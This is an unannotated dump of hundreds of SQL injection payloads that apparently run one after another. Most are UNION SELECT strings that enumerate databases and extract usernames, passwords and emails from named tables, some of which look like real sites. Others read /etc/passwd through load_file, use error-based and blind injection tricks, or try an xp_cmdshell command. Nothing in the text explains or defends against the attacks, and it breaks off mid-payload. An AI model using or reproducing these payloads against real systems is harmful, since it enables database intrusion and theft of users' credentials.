1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12-- -2 UNION SELECT 1,CONCAT_WS(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* 2 UNION SELECT 1,concat_ws(0x3a,Version(),database(),user()),3,4 LIMIT 1,1 -2 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9-- -2 union select 1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7/* -2' union select 1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/* -2 union select 1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10/* -2 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8,9/* 2 union select 1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6 -- -2 union select 1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13-- -2 union select 1,convert(concat_ws(0x3a,username,password,salt) using latin1) from vb_user limit 1,2 -2 union select 1,convert(version() using latin1)/* -2 union select 1,database()-- 2 union select 1,database(),3,4,5,6,7,8,9,10,11 -- -2 union select 1,database(),3,4,5,6,7,8,user(),10,11,12-- -2 union select 1,DATABASE(),3,VERSION(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* 2 union select 1 from users -2 union select 1,group_concat(0x0b,TABLE_NAME),3,4,5,6 from information_schema.tables-- -2 union select 1,group_concat(0x0b,table_name) from information_schema.tables-- -2 union select 1,group_concat(0x3C494E4A5F494E464F3E,user(),0x3a,database(),0x3a,version(),0x3C494E4A5F494E464F3E),3,4,5,6,7-- -2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables -- -2 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61 -2 union select 1,group_concat(table_name) from information_schema.tables -- -2 union select 1,group_concat(table_name) from information_schema.tables-- -2 union select 1,group_concat(username,0x3a,password) from user-- -2 union select 1,group_concat(user_name,0x3a,user_password),3,4,5,6,7 from administrators-- 2 ' union select 1,group_concat(version(),0x3a,database()),3,4 from information_schema.tables-- 2 union select 1,load_file(0x2f6574632f706173737764),3,4,5,6,7-- -2 union select 1,load_file('/etc/passwd'),3,4-- -2 union select 1,load_file('/etc/passwd'),3,4 from mysql.user/* 2 union select 1,name,3 from MSysObjects where MSysObjects.Type=6-- -2 union select 1,passwd,name,4,5,6,email,8,9 from users/* 2 union select 1,password,3,login from users limit 7,10/* -2 union select 1,password from users 2'/**/union/**/select 1,password,username,4,5,6,7,8,9 from user/* -2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from information_schema.tables limit 38,1/* -2 union select 1,TABLE_NAME,concat(column_name,0x3a,table_schema) FROM INFORMATION_SCHEMA.columns limit 559,1/* -2 union select 1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES limit 13,1/* -2 union select 1,unhex(hex(concat_ws(0x3a,user,password))),3,4,5,6,7,8 from mysql.user/* -2' union select 1,user(),3,4,5,6,7,8,9,10 -- 2 union select 1,user(),3,database(),5,6,7,8,9,10/* -2 union select 1,user(),3,version(),5,6,7/* -2' union select 1,username,3,user_password,5,6,7,8,9,0,1 from bb2_users limit 1,1/* 2 union select 1,username,pass,4 from user -- -2 union select 1,version(),3/* -2' UNION SELECT 1,version(),3,4-- 2 union select 1,version(),3,4,5-- -2 union select 1,version(),3,4,5,6,7 -- -2 union select 1,version(),3,4,5,6,7-- -2 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -2 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -2 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -2 union select 1,version(),3,4 from news/* -2 union select 1,@@version_comment,@@datadir,@@tmpdir,@@version,user(),database(),@@version_compile_os,@@version_compile_machine,@@warning_count,@@system_time_zone,@@query_cache_size,13,14,15,16,17,18 2 union select 1,version(),user(),database()-- -2 union select aes_decrypt(aes_encrypt(concat(username,0x3a,password,0x3a,email),0x71),0x71) from users limit 1,99/* 2 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71) LIMIT 1,1-- 2 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3,version(),user(),database()),0x71),0x71) 2 union select cast(version()||chr(58)||userasint),null,null,null,null,null,null,null,null from pg_user;-- 2 union select column_name,2 from information_schema.columns where table_name=0x6c6162676561725f -2 union select concat(admin_name,0x3a,admin_pass) from admin-- -2 union select concat(login,0x3a,haslo) from ol_admin limit 0,1/* -2 union select concat(login,char(58),pwd) from users limit 0,1/* -2' union select concat(user,char(58),password),version(),3,4,5,6,7,8,9,10,11,12 from mysql.user/* -2 union select concat(user(),char(58),version(),char(58),database()) -2 union select concat(username,0x3a,password),2 FROM cfaq_admin/* -2 union select concat(version(),0x20,user(),0x20,database())-- -2 union select concat(version(),0x2F,database(),0x2F,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -2 union select concat(version(),0x3a,database(),0x3a,user(),0x3a,name,0x3a,password),2,3,4 from users/* 2 union select concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6 limit 1,1/* 2 union select concat(version(),char(58,58),database(),char(58,58),user()),2,3,4/* -2' union select concat_ws(0x2a,database(),version(),user(),@@version_compile_os),2 -- -2 uNIon sELEct concat_ws(0x3a3a,aid,name,pwd,radminsuper),2 from nuke_authors -- -2' union select concat_Ws(0x3a3a,login,passw,email,status,moderator,priv) from pw_club_users where moderator>0 -- 2 union select concat_ws(0x3a,ID,Login,Passw),2,3,4,5,6 from authUser/* -2 union select concat_ws(0x3a,login,pass,ip,name) from test.1ckkm_adm_usr-- 2 union select concat_ws(0x3a,nick,email,passwd,homepage),2,3,4 from users limit 2433,1/* -2 union select concat_ws(0x3a,user(),version(),database()),2,3 -- -2 union select concat_ws(0x3a,user(),version(),database()),2,3,4 -- 2 UNION SELECT concat_ws(0x3a,user(),version(),database()) LIMIT 1,1/* -2 union select concat_ws(0x3a,version(),0x3a ,user(),@@version_compile_os),2,3,4,5,6-- -2 union Select concat_ws(0x3a,version(),database(),user()) -- -2 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11-- -2 union select concat_ws(0x3a,version(),user()),2,3,4,5,6/* 2 union select concat_ws(0x3a,version(),user(),database()),22222,33333,444444 limit 1,1 -- 2 union select concat_ws(0x3b,version(),user(),database()),2,3,4,5,6,7,8,9,0,1,2,3,4,5 -- -2 union select concat_ws(0x3,version(),user(),database()),2,3,4,5/* -2 union select concat_ws(user(),database()),2,3 -- -2 union select database(),2,3,4 /* -2 union select group_concat(member_id,0x3a,member_login,0x3a,member_password),2,3,4 from members-- 2' union select null /* 2 union select null,null,USER()/* -2 union select table_name,2,3,4,5 from INFORMATION_SCHEMA.TABLES limit 19,1 2 union select table_name,2,3,4 from information_schema.tables 2 union select user(),2,3 limit 10,10-- 2 union select user,2,password,4,5,6 from mysql.user limit 0,10/* 2 UNION SELECT version(),2,3,4 -- 2) union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 2';Use master exec xp_cmdhshell 'ping127.0.0.1'-- 300000000000000 UNION SELECT 1,2,concat_ws(0x3a ,user(),database(),version()),4,5/* 30000000 UNION SELECT concat_ws(0x3a,user_id,username,user_password,user_email,user_icq),2,3 from phpbb_users limit 1,1/* -30004' union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14 -- 3000')) and (select email from tbl_admin_users where id=2)=NULL -- 3001 and 1=0 union select 1,2,concat_ws(0x3a,email,level,pass),4,5,6,7,8,9,10,11,12,13 from users-- -30051' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 30065 and 1=0 union select 1,group_concat(table_name separator 0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables where table_schema=0x666172616f6e7374666172616f6e-- -30082501 union select 1,convert(concat_ws(0x3a,version(),database(),user()) using binary),3,4,5,6,7,8,9,10,11,12,13,14 300' and 1=1 union select 1,2,3,concat_ws(0x3a,username,userpass),5,6,7,8,9,10,11,12,13,14,15,16,17 from cms_buchenwald.cms71_beuser limit 1,1-- -300 union select 1,2,3,4,5,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -300 union select 1,2,concat(login,char(58),pass),4,5,6,7,8,9,10,11,12,13 from users-- 30100 UNION SELECT 1,USER_ID,3,4,5,6,7,8,9,0 FROM USER/* -3010 union select concat(login,char(58),password),2,3,4,5,6,7,8 from users limit 2,1 -- -3014 union select 1,concat_ws(0x3a,version(),user(),database()),3,4-- 3015 and(1=2) union select version() 3017 and 1=0 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),group_concat(0x0b,username,0x3a3a,user_password,0x3a3a,user_email),4,5 from phpbb_users-- -301 union select 1,2,3,aes_decrypt(aes_encrypt(concat(user(),char(32,58,32),version(),char(32,58,32),database()),1),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -301 union select 1,2,3,concat_ws(0x3a,user(),database(),version()) -- -301 union select 1,2,concat_ws(0x203a20,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users/* -301 union select 1,2,login,4,5,6,7,8,9,10,11 from usuarios -- 301 union select concat_ws(0x3a,user(),version(),database())-- -302 and 1=0 union all select 1,concat_ws(0x3a,password,email,username),3,4 from sexdating_no.sexdating_users limit 0,1 -- 302 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5 #302 union sleect 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 -- 303 and 1=0 union select 1,2,3,4,5,6,7,8,9 303 and 1=0 union select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name='users' -- -303 union select 1,2,3,4,5,6,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),8,9,10,11,12,13,14,15,16,17,18,19,20-- -303 union select 1,2,3,concat(username,0x3a,user_password),user(),6,7 from phpbb_users-- -30437 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 -- -3044 union select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),5 -- 3047-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -3048 union select 1,concat_ws(0x3b,pass,user()),3,4,5,6,7,8,9,10,11,12,13 from users-- -304 and 1=2 union select 1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,user(),database(),@@version))),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43-- -304 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; ##304 union select1,2,3,4,%String_Col%,6,7,8,9-- -304 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -30545 union select 1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from users limit 1,1/* 30554 union select 1,2,database() -- -3057 UNION SELECT 1,concat(USER(),char(58),VERSION(),char(58),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* -3057' union select 1,username,password,4 from users limit 0,1 -- -3058 union select 1,2,3,4,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10 from INFORMATION_SCHEMA.COLUMNS/* -30598 union select 1,2,3,4,5,6,7,concat(version(),char(58,58),database(),char(58,58),user()),9,10/* -305 union select 1,2,3,4,5,6,7,8,9,concat(version(),0x20,database(),0x20,user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -305' union select 1,2,group_concat(table_schema,0x3a,table_name,0x3a,column_name),4 from information_schema.columns where column_name like '%25pass%25'-- -305 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7 -- -3063 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,database(),version(),user()),10,11,12,13,14,15,16,17,18,19,20-- 3067798798765 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18-- -3067 union select 1,2,3,4,concat_ws(0x3a3a,user_id,username,userpass,session,last_visit),6,7,8,9,10,11,12,13,14,15 from poll_user -- -3068 union select 1,2,concat(name,0x3a,login,0x3a,password,0x3a,email),4,5 from users/* -306 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -306 union select 1,2,3,4,admin_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from admin -- -306 union select 1,concat_ws(0x3a3a,id,pass,name,email,perm),3,4,5,6,7 from users -- 30709709878768531 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -3071 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0-- 3075-1 union select concat(version(),char(58),database(),char(58),user()) -307 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 308' and 1=0 UnIon selECt 1,version(),3,4,5,6,7,8,9,10 -- 30910 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,concat_ws(0x3a,user(),version(),database()),45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,concat_ws(0x3a,username,password) from user-- -309123 union select group_concat(version(),char(58),user(),char(58),database()) -- 3092' UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C696E6A656E64),0x71),0x71) FROM INFORMATION_SCHEMA.TABLES LIMIT 45,1/* 3092' UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) LIMIT 1,1/* 3092' union select 1,group_concat(table_name) from information_schema.tables group by table_schema limit 2,1/* 309809777809 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 30-999.9 union select 1,database(),version(),4,5,6,7,8,9,10,11,12-- -309 union select 1,2,3,unhex(hex(version())),5,6,7,8,9-- 30 and 1=0 union select 1,2,3,4,5-- 30 and 1=0 union select 1,2,3,concat(user,char(58),password),5,6 from mysql.user-- 30 and 1=0 union select 1,2,version(),4,5,6,7-- 30 and 1=0 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- 30 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)) having min(0) or 1-- 30 union select 0,1,2,3,4,5,6,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1),8,9,10,11,12,13,14,15/* -30' UNION SELECT 0,1,2,concat_ws(0x0b,user(),database(),version()) /* -30 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,concat_ws(0x3a,version(),user(),database()),41,42-- -30 UNION SELECT 1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database()),11,12,13,14,15,16,17,18,19,20,21,22,23/* -30 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3A3a,login,pass,id),11,12,13,14,15 from users/* -30 union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 30' union select 1,2,3,4,5,6,7,8,9,VERSION(),DATABASE(),12,13,14,15,16,17,18,19,20/* -30 union select 1,2,3,4,5,6,database(),8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,user(),26,27,28,29,30,31,32,33,34,35,36,37,38/* 30 union select 1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,43 from tbl_admin limit 1,1-- -30 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9-- 30 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10 -- -30 union select 1,2,3,4,group_concat(user(),0x0b,database(),0x0b,version()),6,7,8,9 -- -30 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7-- -30 union select 1,2,concat(0x2a,user(),0x2a,database(),0x2a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -30 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from jos_users limit 0,1-- -30 union select 1,2,concat_ws(0x3a ,user(),database(),version()),version() from news/* -30 union select 1,2,concat_ws(0x3a,version(),database(),user())-- 30' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12-- -30 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables -- 30 union select 1,2,group_concat(table_name separator 0x7c),4,5,6,7,8,99,10,11,12,13,14,15 from information_schema.tables where table_schema=0x776F726B737061636531-- -30 union select 1,2,SQL,4-- 30 union select 1,2,version(),user(),5,6,7,8/* -30 union select 1,char(241,243,239,229,240,45,236,229,227,224,32,234,240,243,242,238,233,32,237,238,243,242),3,char(40,236,238,228,229,235,252,32,92,34,243,240,243,240,243,92,34,41),5,6,char(237,232,232,239,224,246,224,32,241,234,238,235,252,234,238,32),8,9,char(205,238,226,224,255,32,236,238,228,229,235,252,32,241,243,239,229,240,45,236,229,227,224,32,234,240,243,242,238,227,238,32,237,238,243,242,224,32,211,208,211,208,211,32,239,238,236,238,230,229,242,32,226,224,236,32,226,32,242,224,234,238,236,32,237,229,235,184,227,234,238,236,32,228,229,235,229,32,234,224,234,32,213,221,202,46,32,206,242,235,232,247,232,242,232,235,252,237,238,32,238,241,238,225,229,237,237,238,241,242,252,254,32,228,224,237,237,238,233,32,236,238,228,229,235,232,32,255,226,235,255,229,242,241,255,32,236,232,245,224,237,232,231,236,32,240,224,231,225,232,226,224,237,232,255,32,234,224,236,237,229,233,32,232,32,226,251,231,238,226,32,232,231,32,227,235,243,225,232,237,32,238,234,229,224,237,224,32,241,224,236,238,227,238,32,202,242,243,235,245,243),char(208,250,235,252,255,245),150,5,char(237,232,234,224,234,238,227,238,32,237,224,245,229,240,32,239,240,238,246,229,241,241,238,240,224),char(237,232,234,224,234,238,227,238,32,237,224,245,229,240,32,239,240,238,246,229,241,241,238,240,224),char(245,231),char(51,50,32,234,225),0,char(207,238,228,228,229,240,230,234,224,32,240,224,231,240,229,248,229,237,232,255,32,49,120,49,32,112,105,99,115),50000,char(237,232,245,240,229,237,224,32,238,237,32,237,229,32,247,232,242,224,229,242),char(237,229,242),char(236,238,228,229,236,32,241,238,32,241,234,238,240,238,241,242,252,254,32,57,57,57,32,71,98,105,116,47,115),char(237,232,245,240,229,237,224,32,238,237,32,237,229,32,247,232,242,224,229,242),0,1400000,char(239,238,230,232,231,229,237,237,238,32,237,224,245),char(77,83,45,68,79,83),char(239,224,235,252,247,229,234,238,226,224,255),char(221,242,238,242,32,237,238,243,242,225,243,234,32,226,251,32,236,238,230,229,242,229,32,234,243,239,232,242,252,32,243,32,83,112,121,100,101,114,92,39,97,46,32,65,78,84,73,67,72,65,84,32,82,117,108,101,115,33,33,33) -30 union select 1,concat(email,char(58),username,char(58),password),3,4,5,6 from users limit 2969,1/* -30 union select 1,concat(id,char(58),twitterUserName),3,4,5 from user -30 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5-- -30 union select 1,concat_ws(0x3a3a,id,name,username,email,password,usertype) from aben_users -- -30 union select 1,concat_ws(0x3a,user(),@@version_compile_os,version()),3,4-- -30 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9-- 30' UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4-- -30 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11/* -30 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6-- -30 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- -30 union select 1,database(),3,user(),VERSION(),6,7,8,9,10,11/* -30 UNION SELECT 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users/* -30 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3 -- 30 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,version(),user(),database()),0x71),0x71),2,3,4/* -30 union select concat(0x2a,user(),0x2a,database(),0x2a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 30 union select concat_ws(0x3a,@@version,@@version_compile_os,@@version_comment,@@version_compile_machine),2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2 -3101 union select 1,2,3,4,5,USER(),DATABASE(),VERSION(),9,11,12,13/* 310' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from users -- -310 union select 1,2,concat_ws(concat(char(32),char(58),char(32)),user(),version(),database(),@@version_compile_os,@@datadir,@@tmpdir,@@basedir),4,5,6,7,8,9 -31152 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -311 union select 1,2,3,unhex(hex(concat_ws(0x3a,username,user_password,user_icq))),5,6,7,8 from phpbb_users limit 0,1-- -311 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -311 union select 1,version(),3,user(),5,6,7,8,9,@@version_compile_os,11,12,13,14,15,16,17,18,19-- -311 union select chrPassword,2,3,4,5,6,7,8 from admin/* -311 union select concat_ws(0x3a3a,name,password),2,3,4,5,6,7,8,9,10 from gmavtovazru.auth-- 311' union select concat_ws(0x3a,name,pass) from users/* -31224 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 31234567 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18-- -312 union select 1,2,3,concat_ws(0x3a3a,username,password),5,6,7 from members -- -312 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -3131 union all select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12 -- 31337 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/* 3136 and substring(@@version,1,1)=3-blindsql -31370 union select 1,2,3,concat_ws(char(58),name,pwd,email),5,6 from users/* -3138 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from information_schema.tables -- 313 and mid(version(),1,1)=5-- 313 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version()),1,64),floor(rand(0)*2))) -313 union select 1,2,3,4,concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),6,7,8,9-- 313 union select 1,concat_ws(0x3a,username,password),3 from Users-- -313' union select 1,table_name,3,4,5,6,7,8 from information_schema.tables -- 3144 and 1=0 union select 1,version(),3-- -31456 union select 1,2,3,4,5,6,7,8,9,10,11 from admin_users/* 3149 and 0 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8 314 and 1=0 UnIOn SElect version(),2-- -314 union select user(),version(),database()/* -3151 union select 1,2,3,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),5,6,7,8,9,10,11,12 from mysql.user/* -31521 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13 -- 315 or 1=(select top 1 column_name from information_schema.columns where table_name='tbl_users' and column_name not in ('id','kb_login','kb_password'))-- -315 union select 1,2,3,4,5,6,7,8,9,10,11,concat(admin_id,char(58),name_surname,char(58),username,char(58),password),13,14,15,16,17,18,19,20,21,22,23 from authorization-- 315 union select 1,concat(username,0x3a,email),3,4 from users/ 316526172';select cast(usename||chr(58)||passwdasint),null,null,null,null,null,null,null from pg_shadow-- 316 order by 4 -- 316 uNiOn sElEct 1,2,unhex(hex(database())),4,5,6 /* -316/**/union/**/select/**/table_name from information_schema.tables-- -317104 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a ,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 31715 and substring(concat((select version() from information_schema.columns limit 0,1),1,1),1,1)=5 -3171 union select 1,login,id,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from users limit 3570,1/* 31730' and 7=9 union select 1,2,3,4,5,group_concat(concat_ws(0x3a,username,password)),7,8,9,10 from adminpass -- -31795 union select 1,2,3,4,5,6,concat_ws(0x3A3a,id,name,email,passwort),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from foren_accounts/* -317 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 3180 union select concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1/* -3187 union select 1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,table_name,9,10 from information_schema.tables/* 318 and 2=1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# -318 union select 1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from INFORMATION_SCHEMA.TABLES-- -3195 union /*!select*/ 0,1,2,3,4,5,6,7,8,9,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 3-199 union select 1,concat_ws(0x3a,username,passwd),3 from users-- -319 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 319' UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* -319 union select concat(login,char(58),passwd) from admin -- 31 and 1=0 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13 from information_schema.tables where table_schema=0x555341-- 31 and 1=2 union select 1,2,3,4,5,version(),7 -31 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8-- -31 UNION SELECT 0,1,2,3,4,5,6,concat_ws(0x0b,user(),database(),version()),8,9 31' union select 1/* 31 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, -31' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 -- -31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27,28,29,30,31 -31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24,25/* -31 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,version(),user(),database()),12,13,14-- -31 union select 1,2,3,4,5,6,7,concat(username,0x3a,user_password) from phpbb_users/* -31' union select 1,2,3,4,5,6,concat_ws(0x203a20,user(),database(),version(),@@version_compile_os)/* -31 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x414b4b -- -31 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15-- 31 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10-- -31 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -- -31 union select 